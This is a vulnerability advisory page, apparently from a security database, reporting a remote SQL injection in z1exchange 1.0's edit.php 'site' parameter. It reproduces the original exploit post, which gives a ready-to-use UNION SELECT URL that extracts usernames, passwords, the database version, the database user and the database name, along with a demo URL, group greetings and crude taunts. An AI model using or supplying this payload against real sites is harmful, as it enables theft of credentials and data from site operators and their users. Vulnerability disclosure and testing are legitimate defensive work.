z1exchange 1.0 (edit.php site) Remote SQL Injection Vulnerability

2009.02.28
Credit: jiko
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

------------------------------------------------------------------------- -- JIKO FroM No-exploit.Com --- ------------------------------------------------------------------------- # Author : jiko # email : jalikom@hotmail.com # Home : www.no-exploit.Com # Script : z1exchange-->http://1scripts.net/scripts/z1exchange.zip Proud To Be MoroCCaN -->> WwW.No-ExploiT.CoM , WwW.Exploiter5.CoM Fkhatar L3chran wwlad darb wlidat l9issm wmansach L3chira =========================[JAWAD Cha7ta 4 ever]=================== # Exploit : http://no-exploit.com http://no-exploit.com//z1exchange/edit.php?site=[sql] http://no-exploit.com//z1exchange/edit.php?site=-12%20union%20select%200,1,username,password,4,version(),user(),7,8,9,10,11,database(),13,14,15,16,17,18++from+users-- DEMO: http://localhost/scripts/z1exchange/z1exchange/edit.php?site=-12 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- =========================[Thanks To Allah ]=================== greetz : all my friend and all No-exploit members and $ Gold_M $ Cochlain $ Hassin X $ cyber-zone $ r00t c0d3r $ HiSoKa $ MizoZ $ leopard all muslims visit: www.no-exploit.Com Visit: My-montada.Co.cc For your free Forum ------------------------------------------------------------------------- -- JIKO FroM No-exploit.Com --- ------------------------------------------------------------------------- ------== troops of Mohamed comming inchalah =----------------- Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc Raha nayda Nood :)Fuck Bigg Kbir Lkarcha Bo ta7cha stoon dyalibou7do hwa cha7ta ++--------------------------------------------------------------------------------------------------------------------------------------------------------+ ++ [!] Fi Khater Mgharba wahed wahed , Kima tayGol Khoya cyber-zone , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!] ++ +--------------------------------------------------------------------------------------------------------------------------------------------------------++


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top